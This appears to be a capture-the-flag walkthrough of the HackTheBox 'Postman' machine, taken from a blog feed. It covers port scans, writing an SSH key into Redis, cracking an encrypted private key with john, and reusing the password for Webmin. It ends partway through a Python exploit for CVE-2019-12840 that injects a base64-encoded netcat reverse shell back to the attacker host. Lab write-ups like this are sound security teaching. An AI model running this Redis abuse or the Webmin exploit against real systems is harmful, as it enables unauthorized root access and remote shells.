https://h4r1337.github.io/tags/webmin/Recent content in Webmin onHugo -- gohugo.ioenWed, 24 Jun 2026 18:14:09 +0530https://h4r1337.github.io/posts/postman/Wed, 24 Jun 2026 18:14:09 +0530https://h4r1337.github.io/posts/postman/<h3 id="overview">Overview</h3> <figure> <img src="https://h4r1337.github.io/img/postman/cover.webp"></figure> <table> <thead> <tr> <th style="text-align: center">Title</th> <th style="text-align: center"><a href="https://app.hackthebox.com/machines/Postman">Postman</a></th> </tr> </thead> <tbody> <tr> <td style="text-align: center">Difficulty</td> <td style="text-align: center">Easy</td> </tr> <tr> <td style="text-align: center">Machine</td> <td style="text-align: center">Linux</td> </tr> <tr> <td style="text-align: center">Maker</td> <td style="text-align: center"><a href="https://app.hackthebox.com/users/114053"><img src="https://www.hackthebox.com/badge/image/114053" alt="" style="display: unset"></a></td> </tr> </tbody> </table> <br> <div class="alert alert-tip collapsed"> <div class="alert-heading-box" onclick="toggleAlert(this)" > <i class="bx bx-bulb"></i> <p class="alert-heading"> About Postman </p> <i class='bx bx-chevron-down collapsed'></i> </div> <div class="alert-content" style="display: none;" > <p>Postman is an easy difficulty Linux machine, which features a Redis server running without authentication. This service can be leveraged to write an SSH public key to the user's folder. An encrypted SSH private key is found, which can be cracked to gain user access. The user is found to have a login for an older version of Webmin. This is exploited through command injection to gain root privileges.</p><h3 id="overview">Overview</h3> <figure> <img src="https://h4r1337.github.io/img/postman/cover.webp"></figure> <table> <thead> <tr> <th style="text-align: center">Title</th> <th style="text-align: center"><a href="https://app.hackthebox.com/machines/Postman">Postman</a></th> </tr> </thead> <tbody> <tr> <td style="text-align: center">Difficulty</td> <td style="text-align: center">Easy</td> </tr> <tr> <td style="text-align: center">Machine</td> <td style="text-align: center">Linux</td> </tr> <tr> <td style="text-align: center">Maker</td> <td style="text-align: center"><a href="https://app.hackthebox.com/users/114053"><img src="https://www.hackthebox.com/badge/image/114053" alt="" style="display: unset"></a></td> </tr> </tbody> </table> <br> <div class="alert alert-tip collapsed"> <div class="alert-heading-box" onclick="toggleAlert(this)" > <i class="bx bx-bulb"></i> <p class="alert-heading"> About Postman </p> <i class='bx bx-chevron-down collapsed'></i> </div> <div class="alert-content" style="display: none;" > <p>Postman is an easy difficulty Linux machine, which features a Redis server running without authentication. This service can be leveraged to write an SSH public key to the user's folder. An encrypted SSH private key is found, which can be cracked to gain user access. The user is found to have a login for an older version of Webmin. This is exploited through command injection to gain root privileges.</p> </div> </div> <script> function toggleAlert(headerElement) { var alertBox = headerElement.parentElement; var alertContent = alertBox.querySelector('.alert-content'); var icon = headerElement.querySelectorAll('i')[1]; alertBox.classList.toggle('open'); alertBox.classList.toggle('collapsed'); if (alertBox.classList.contains('open')) { alertContent.style.display = 'block'; icon.classList.remove('open'); icon.classList.add('collapsed'); } else { icon.classList.remove('collapsed'); icon.classList.add('open'); alertContent.style.display = 'none'; } } </script> <hr> <h2 id="information-gathering">Information Gathering</h2> <p>Scanned all TCP ports:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>sudo nmap -p- --min-rate <span style="color:#d3869b">5000</span> -vv $IP -oA recon/nmap/ports </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Nmap scan report <span style="color:#fe8019">for</span> 10.129.2.1 </span></span><span style="display:flex;"><span>Host is up, received echo-reply ttl <span style="color:#d3869b">63</span> <span style="color:#fe8019">(</span>0.19s latency<span style="color:#fe8019">)</span>. </span></span><span style="display:flex;"><span>Not shown: <span style="color:#d3869b">65524</span> closed tcp ports <span style="color:#fe8019">(</span>reset<span style="color:#fe8019">)</span> </span></span><span style="display:flex;"><span>PORT STATE SERVICE REASON </span></span><span style="display:flex;"><span>22/tcp open ssh syn-ack ttl <span style="color:#d3869b">63</span> </span></span><span style="display:flex;"><span>80/tcp open http syn-ack ttl <span style="color:#d3869b">63</span> </span></span><span style="display:flex;"><span>6379/tcp open redis syn-ack ttl <span style="color:#d3869b">63</span> </span></span><span style="display:flex;"><span>10000/tcp open snet-sensor-mgmt syn-ack ttl <span style="color:#d3869b">63</span> </span></span><span style="display:flex;"><span>25716/tcp filtered unknown no-response </span></span><span style="display:flex;"><span>37347/tcp filtered unknown no-response </span></span><span style="display:flex;"><span>40361/tcp filtered unknown no-response </span></span><span style="display:flex;"><span>43249/tcp filtered unknown no-response </span></span><span style="display:flex;"><span>54381/tcp filtered unknown no-response </span></span><span style="display:flex;"><span>58441/tcp filtered unknown no-response </span></span><span style="display:flex;"><span>62883/tcp filtered unknown no-response </span></span></code></pre></div><p>Enumerated open TCP ports:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nmap -p22,80,6379,10000 -sC -sV --min-rate <span style="color:#d3869b">5000</span> $IP -oA recon/nmap/service </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Nmap scan report <span style="color:#fe8019">for</span> 10.129.2.1 </span></span><span style="display:flex;"><span>Host is up, received echo-reply ttl <span style="color:#d3869b">63</span> <span style="color:#fe8019">(</span>0.29s latency<span style="color:#fe8019">)</span>. </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>PORT STATE SERVICE REASON VERSION </span></span><span style="display:flex;"><span>22/tcp open ssh syn-ack ttl <span style="color:#d3869b">63</span> OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span style="color:#fe8019">(</span>Ubuntu Linux; protocol 2.0<span style="color:#fe8019">)</span> </span></span><span style="display:flex;"><span>| ssh-hostkey: </span></span><span style="display:flex;"><span>| <span style="color:#d3869b">2048</span> 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 <span style="color:#fe8019">(</span>RSA<span style="color:#fe8019">)</span> </span></span><span style="display:flex;"><span>| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDem1MnCQG+yciWyLak5YeSzxh4HxjCgxKVfNc1LN+vE1OecEx+cu0bTD5xdQJmyKEkpZ+AVjhQo/esF09a94eMNKcp+bhK1g3wqzLyr6kwE0wTncuKD2bA9LCKOcM6W5GpHKUywB5A/TMPJ7UXeygHseFUZEa+yAYlhFKTt6QTmkLs64sqCna+D/cvtKaB4O9C+DNv5/W66caIaS/B/lPeqLiRoX1ad/GMacLFzqCwgaYeZ9YBnwIstsDcvK9+kCaUE7g2vdQ7JtnX0+kVlIXRi0WXta+BhWuGFWtOV0NYM9IDRkGjSXA4qOyUOBklwvienPt1x2jBrjV8v3p78Tzz </span></span><span style="display:flex;"><span>| <span style="color:#d3869b">256</span> 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 <span style="color:#fe8019">(</span>ECDSA<span style="color:#fe8019">)</span> </span></span><span style="display:flex;"><span>| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIRgCn2sRihplwq7a2XuFsHzC9hW+qA/QsZif9QKAEBiUK6jv/B+UxDiPJiQp3KZ3tX6Arff/FC0NXK27c3EppI<span style="color:#fe8019">=</span> </span></span><span style="display:flex;"><span>| <span style="color:#d3869b">256</span> ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 <span style="color:#fe8019">(</span>ED25519<span style="color:#fe8019">)</span> </span></span><span style="display:flex;"><span>|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF3FKsLVdJ5BN8bLpf80Gw89+4wUslxhI3wYfnS+53Xd </span></span><span style="display:flex;"><span>80/tcp open http syn-ack ttl <span style="color:#d3869b">63</span> Apache httpd 2.4.29 <span style="color:#fe8019">((</span>Ubuntu<span style="color:#fe8019">))</span> </span></span><span style="display:flex;"><span>|_http-favicon: Unknown favicon MD5: E234E3E8040EFB1ACD7028330A956EBF </span></span><span style="display:flex;"><span>| http-methods: </span></span><span style="display:flex;"><span>|_ Supported Methods: OPTIONS HEAD GET POST </span></span><span style="display:flex;"><span>|_http-title: The Cyber Geek<span style="color:#b8bb26">&#39;s Personal Website </span></span></span><span style="display:flex;"><span><span style="color:#b8bb26">|_http-server-header: Apache/2.4.29 (Ubuntu) </span></span></span><span style="display:flex;"><span><span style="color:#b8bb26">6379/tcp open redis syn-ack ttl 63 Redis key-value store 4.0.9 </span></span></span><span style="display:flex;"><span><span style="color:#b8bb26">10000/tcp open http syn-ack ttl 63 MiniServ 1.910 (Webmin httpd) </span></span></span><span style="display:flex;"><span><span style="color:#b8bb26">|_http-title: Site doesn&#39;</span>t have a title <span style="color:#fe8019">(</span>text/html; Charset<span style="color:#fe8019">=</span>iso-8859-1<span style="color:#fe8019">)</span>. </span></span><span style="display:flex;"><span>| http-methods: </span></span><span style="display:flex;"><span>|_ Supported Methods: GET HEAD POST OPTIONS </span></span><span style="display:flex;"><span>|_http-favicon: Unknown favicon MD5: 066AF1F6A59FCB67495B545A6B81F371 </span></span><span style="display:flex;"><span>|_http-server-header: MiniServ/1.910 </span></span><span style="display:flex;"><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel </span></span></code></pre></div><hr> <h2 id="enumeration">Enumeration</h2> <h3 id="port-80---http-apache">Port 80 - HTTP (Apache)</h3> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260611180327.webp"></figure> <p>Directory listing is enabled</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260611180555.webp"></figure> <p>But nothing else&hellip;</p> <h3 id="port-10000---http-miniserv-1910">Port 10000 - HTTP (MiniServ <code>1.910</code>)</h3> <p>Landing page is redirecting to https</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260611182054.webp"></figure> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260611182130.webp"></figure> <p>After some searching, found out that this version is vulnerable to <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-12840"><code>CVE-2019-12840</code></a>, but it requires credentials. Default credentials are not working either. Moving to next port.</p> <h3 id="port-6379---redis-409">Port 6379 - Redis <code>4.0.9</code></h3> <p>We can access redis without credentials:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>nc -v $IP <span style="color:#d3869b">6379</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#928374;font-style:italic"># To list all configurations</span> </span></span><span style="display:flex;"><span>config get * </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624141442.webp"></figure> <p>The <code>dir</code> variable stores the value of the user directory of the service:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>config get dir </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624141634.webp"></figure> <p>We are in <code>/var/lib/redis</code>. We can try to <a href="https://hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html#ssh">write an ssh key</a> to <code>/var/lib/redis/.ssh/authorized_keys</code> to get ssh access as the <code>redis</code> user.</p> <hr> <h2 id="exploitation">Exploitation</h2> <h3 id="ssh-as-redis-user">SSH as <code>redis</code> user</h3> <p>First create a new ssh key pair:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>ssh-keygen -f redis </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624143242.webp"></figure> <p>Add padding to the public key</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#fe8019">(</span><span style="color:#fabd2f">echo</span> -e <span style="color:#b8bb26">&#39;\n\n&#39;</span>;cat redis.pub;<span style="color:#fabd2f">echo</span> -e <span style="color:#b8bb26">&#39;\n\n&#39;</span><span style="color:#fe8019">)</span> &gt; spaced_key.txt </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624143317.webp"></figure> <p>Set ssh_key value to the public key</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>cat spaced_key.txt| redis-cli -h 10.129.174.184 -x <span style="color:#fabd2f">set</span> ssh_key </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624143437.webp"></figure> <p>Set <code>dir</code> to <code>/var/lib/redis/.ssh</code></p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>config <span style="color:#fabd2f">set</span> dir <span style="color:#b8bb26">&#34;/var/lib/redis/.ssh&#34;</span> </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624143533.webp"></figure> <p>And update the <code>dbfilename</code> to <code>authorized_keys</code> then save.</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>config <span style="color:#fabd2f">set</span> dbfilename <span style="color:#b8bb26">&#34;authorized_keys&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>save </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624143719.webp"></figure> <p>Now let&rsquo;s try to login using the private key</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#928374;font-style:italic"># Set appropriate permission for the private key </span> </span></span><span style="display:flex;"><span>chmod <span style="color:#d3869b">600</span> redis </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#928374;font-style:italic"># Login</span> </span></span><span style="display:flex;"><span>ssh redis@$IP -i redis </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624143751.webp"></figure> <hr> <h2 id="lateral-movement-to-user">Lateral Movement to user</h2> <h3 id="local-enumeration">Local Enumeration</h3> <p>There&rsquo;s some content in the history file of redis user:</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624144121.webp"></figure> <p>Based on the commands there should be a <code>id_rsa.bak</code> file somewhere. We can search it using <code>find</code> command:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>find / -type f -iname <span style="color:#b8bb26">&#39;*.bak&#39;</span> -exec ls -alp <span style="color:#fe8019">{}</span> <span style="color:#b8bb26">\;</span> 2&gt;/dev/null </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624144637.webp"></figure> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>cat /opt/id_rsa.bak </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624144723.webp"></figure> <h3 id="lateral-movement-as-user-matt">Lateral Movement as user <code>Matt</code></h3> <p>The ssh key is encrypted.</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624145513.webp"></figure> <p>We can crack it using john:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>ssh2john id_rsa &gt; hash.txt </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624145828.webp"></figure> <p>Cracking the hash:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>john hash.txt --wordlist<span style="color:#fe8019">=</span>/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624145908.webp"></figure> <p>But we don&rsquo;t have a username. Usually we can dump the public key associated with a private key using the <code>-y</code> flag in <code>ssh-keygen</code>, but in this case the public key didn&rsquo;t contain any username:</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624150115.webp"></figure> <p>From the command history and <code>/etc/passwd</code> we can assume that the user might be <code>Matt</code> and try to login as this user and see if it works or not.</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624150032.webp"></figure> <p>But it failed:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>ssh Matt@$IP -i id_rsa </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624160752.webp"></figure> <p>I checked the <code>/etc/ssh/sshd_config</code> file and saw that we don&rsquo;t have access to ssh as <code>Matt</code> user:</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624160913.webp"></figure> <p>Then I checked if the <code>Matt</code> user have the same password as the passphrase of the ssh key, and it worked:</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624161124.webp"></figure> <hr> <h2 id="privilege-escalation">Privilege Escalation</h2> <h3 id="local-enumeration-1">Local Enumeration</h3> <p>User <code>Matt</code> don&rsquo;t have sudo privileges:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>sudo -l </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624161336.webp"></figure> <p>Also there are no useful suid binaries:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>find / -type f -perm -u<span style="color:#fe8019">=</span>s 2&gt;/dev/null </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624161435.webp"></figure> <p>I tried to list the running processes and saw that the miniserv service is running as root:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>ps -eaf --forest </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624161549.webp"></figure> <p>We already found that this version is vulnerable to <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-12840">CVE-2019-12840</a> but we need working credentials. We can check the <code>/etc/webmin/</code> directory for config files. But the main config file is only readable by the root user:</p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>find . -readable -type f 2&gt;/dev/null </span></span></code></pre></div><figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624162343.webp"></figure> <p>And the above <code>config</code> file doesn&rsquo;t have any credential:</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624162553.webp"></figure> <p>But anyway, we can try the credentials of <code>Matt</code> and see if it is working or not</p> <figure> <img src="https://h4r1337.github.io/img/postman/Pasted%20image%2020260624162752.webp"></figure> <p>And it worked!</p> <h3 id="privilege-escalation---cve-2019-12840">Privilege Escalation - <code>CVE-2019-12840</code></h3> <blockquote> <p>In Webmin through 1.910, any user authorized to the &ldquo;Package Updates&rdquo; module can execute arbitrary commands with root privileges via the data parameter to update.cgi.</p> </blockquote> <p>I created a python script to exploit this referring this exploit found on <a href="https://github.com/zAbuQasem/CVE-2019-12840/blob/main/exploit.py">github</a></p> <div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#928374;font-style:italic">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> requests </span></span><span style="display:flex;"><span><span style="color:#fe8019">from</span> optparse <span style="color:#fe8019">import</span> OptionParser </span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> sys </span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> base64 </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#fe8019">from</span> urllib3.util <span style="color:#fe8019">import</span> retry </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>username <span style="color:#fe8019">=</span> <span style="color:#b8bb26">&#34;Matt&#34;</span> </span></span><span style="display:flex;"><span>password <span style="color:#fe8019">=</span> <span style="color:#b8bb26">&#34;computer2008&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#fe8019">def</span> <span style="color:#fabd2f">exploit</span>(rhost: <span style="color:#fabd2f">str</span>, lhost: <span style="color:#fabd2f">str</span>, lport: <span style="color:#fabd2f">int</span>): </span></span><span style="display:flex;"><span> session <span style="color:#fe8019">=</span> requests<span style="color:#fe8019">.</span>Session() </span></span><span style="display:flex;"><span> rhost <span style="color:#fe8019">=</span> rhost[:<span style="color:#fe8019">-</span><span style="color:#d3869b">1</span>] <span style="color:#fe8019">if</span> rhost<span style="color:#fe8019">.</span>endswith(<span style="color:#b8bb26">&#34;/&#34;</span>) <span style="color:#fe8019">else</span> rhost </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#fe8019">try</span>: </span></span><span style="display:flex;"><span> login <span style="color:#fe8019">=</span> session<span style="color:#fe8019">.</span>post( </span></span><span style="display:flex;"><span> rhost <span style="color:#fe8019">+</span> <span style="color:#b8bb26">&#34;/session_login.cgi&#34;</span>, </span></span><span style="display:flex;"><span> data<span style="color:#fe8019">=</span><span style="color:#b8bb26">f</span><span style="color:#b8bb26">&#34;user=</span><span style="color:#b8bb26">{</span>username<span style="color:#b8bb26">}</span><span style="color:#b8bb26">&amp;pass=</span><span style="color:#b8bb26">{</span>password<span style="color:#b8bb26">}</span><span style="color:#b8bb26">&#34;</span>, </span></span><span style="display:flex;"><span> verify<span style="color:#fe8019">=</span><span style="color:#fe8019">False</span>, </span></span><span style="display:flex;"><span> stream<span style="color:#fe8019">=</span><span style="color:#fe8019">True</span>, </span></span><span style="display:flex;"><span> allow_redirects<span style="color:#fe8019">=</span><span style="color:#fe8019">False</span>, </span></span><span style="display:flex;"><span> proxies<span style="color:#fe8019">=</span>{<span style="color:#b8bb26">&#34;https&#34;</span>: <span style="color:#b8bb26">&#34;http://127.0.0.1:8080&#34;</span>}, </span></span><span style="display:flex;"><span> cookies<span style="color:#fe8019">=</span>{<span style="color:#b8bb26">&#34;sid&#34;</span>: <span style="color:#b8bb26">&#34;x&#34;</span>, <span style="color:#b8bb26">&#34;redirect&#34;</span>: <span style="color:#b8bb26">&#34;1&#34;</span>, <span style="color:#b8bb26">&#34;testing&#34;</span>: <span style="color:#b8bb26">&#34;1&#34;</span>}, </span></span><span style="display:flex;"><span> headers<span style="color:#fe8019">=</span>{ </span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;Content-Type&#34;</span>: <span style="color:#b8bb26">&#34;application/x-www-form-urlencoded&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;Referer&#34;</span>: <span style="color:#b8bb26">f</span><span style="color:#b8bb26">&#34;</span><span style="color:#b8bb26">{</span>rhost<span style="color:#b8bb26">}</span><span style="color:#b8bb26">&#34;</span>, </span></span><span style="display:flex;"><span> }, </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> <span style="color:#fe8019">if</span> login<span style="color:#fe8019">.</span>cookies<span style="color:#fe8019">.</span>get_dict()[<span style="color:#b8bb26">&#34;sid&#34;</span>] <span style="color:#fe8019">!=</span> <span style="color:#b8bb26">&#34;x&#34;</span>: </span></span><span style="display:flex;"><span> <span style="color:#fabd2f">print</span>(<span style="color:#b8bb26">&#34;[+] Executing code&#34;</span>) </span></span><span style="display:flex;"><span> <span style="color:#fe8019">else</span>: </span></span><span style="display:flex;"><span> <span style="color:#fe8019">raise</span> <span style="color:#fb4934">Exception</span>(<span style="color:#b8bb26">&#34;Invalid Credentials&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> payload <span style="color:#fe8019">=</span> <span style="color:#b8bb26">f</span><span style="color:#b8bb26">&#34;bash -c &#39;rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2&gt;&amp;1|nc </span><span style="color:#b8bb26">{</span>lhost<span style="color:#b8bb26">}</span><span style="color:#b8bb26"> </span><span style="color:#b8bb26">{</span><span style="color:#fabd2f">str</span>(lport)<span style="color:#b8bb26">}</span><span style="color:#b8bb26"> &gt;/tmp/f&#39;&#34;</span><span style="color:#fe8019">.</span>encode( </span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;utf-8&#34;</span> </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> payload <span style="color:#fe8019">=</span> base64<span style="color:#fe8019">.</span>b64encode(payload)<span style="color:#fe8019">.</span>decode(<span style="color:#b8bb26">&#34;utf-8&#34;</span>) </span></span><span style="display:flex;"><span> data <span style="color:#fe8019">=</span> [ </span></span><span style="display:flex;"><span> (<span style="color:#b8bb26">&#34;u&#34;</span>, <span style="color:#b8bb26">&#34;acl/apt&#34;</span>), </span></span><span style="display:flex;"><span> (<span style="color:#b8bb26">&#34;u&#34;</span>, <span style="color:#b8bb26">f</span><span style="color:#b8bb26">&#34; | bash -c &#39;echo </span><span style="color:#b8bb26">{</span>payload<span style="color:#b8bb26">}</span><span style="color:#b8bb26"> | base64 -d | bash -i&#39;&#34;</span>), </span></span><span style="display:flex;"><span> (<span style="color:#b8bb26">&#34;ok_top&#34;</span>, <span style="color:#b8bb26">&#34;Update Selected Packages&#34;</span>), </span></span><span style="display:flex;"><span> ] </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> update <span style="color:#fe8019">=</span> session<span style="color:#fe8019">.</span>post( </span></span><span style="display:flex;"><span> rhost <span style="color:#fe8019">+</span> <span style="color:#b8bb26">&#34;/package-updates/update.cgi&#34;</span>, </span></span><span style="display:flex;"><span> data<span style="color:#fe8019">=</span>data, </span></span><span style="display:flex;"><span> verify<span style="color:#fe8019">=</span><span style="color:#fe8019">False</span>, </span></span><span style="display:flex;"><span> stream<span style="color:#fe8019">=</span><span style="color:#fe8019">True</span>, </span></span><span style="display:flex;"><span> allow_redirects<span style="color:#fe8019">=</span><span style="color:#fe8019">False</span>, </span></span><span style="display:flex;"><span> proxies<span style="color:#fe8019">=</span>{<span style="color:#b8bb26">&#34;https&#34;</span>: <span style="color:#b8bb26">&#34;http://127.0.0.1:8080&#34;</span>}, </span></span><span style="display:flex;"><span> headers<span style="color:#fe8019">=</span>{ </span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;Content-Type&#34;</span>: <span style="color:#b8bb26">&#34;application/x-www-form-urlencoded&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#b8bb26">&#34;Referer&#34;</span>: <span style="color:#b8bb26">f</span><span style="color:#b8bb26">&#34;</span><span style="color:#b8bb26">{</span>rhost<span style="color:#b8bb26">}</span><span style="color:#b8bb26">/sysinfo.cgi?xnavigation=1&#34;</span>, </span></span><span style="display:flex;"><span> }, </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> <span style="color:#fe8019">if</span> update<span style="color:#fe8019">.</span>status_code <span style="color:#fe8019">==</span> <span style="color:#d3869b">200</span>: </span></span><span style="display:flex;"><span> <span style="color:#fabd2f">print</span>(<span style="color:#b8bb26">&#34;[+] Success!&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#fe8019">except</span> <span style="color:#fb4934">Exception</span> <span style="color:#fe8019">as</span> e: </span></span><span style="display:flex;"><span> <span style="color:#fe8019">raise</span> (e) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> __name__ <span style="color:#fe8019">==</span> <span style="color:#b8bb26">&#34;__main__&#34;</span>: </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> <span style="color:#fabd2f">error</span>(msg): </span></span><span style="display:flex;"><span> <span style="color:#fabd2f">print</span>(<span 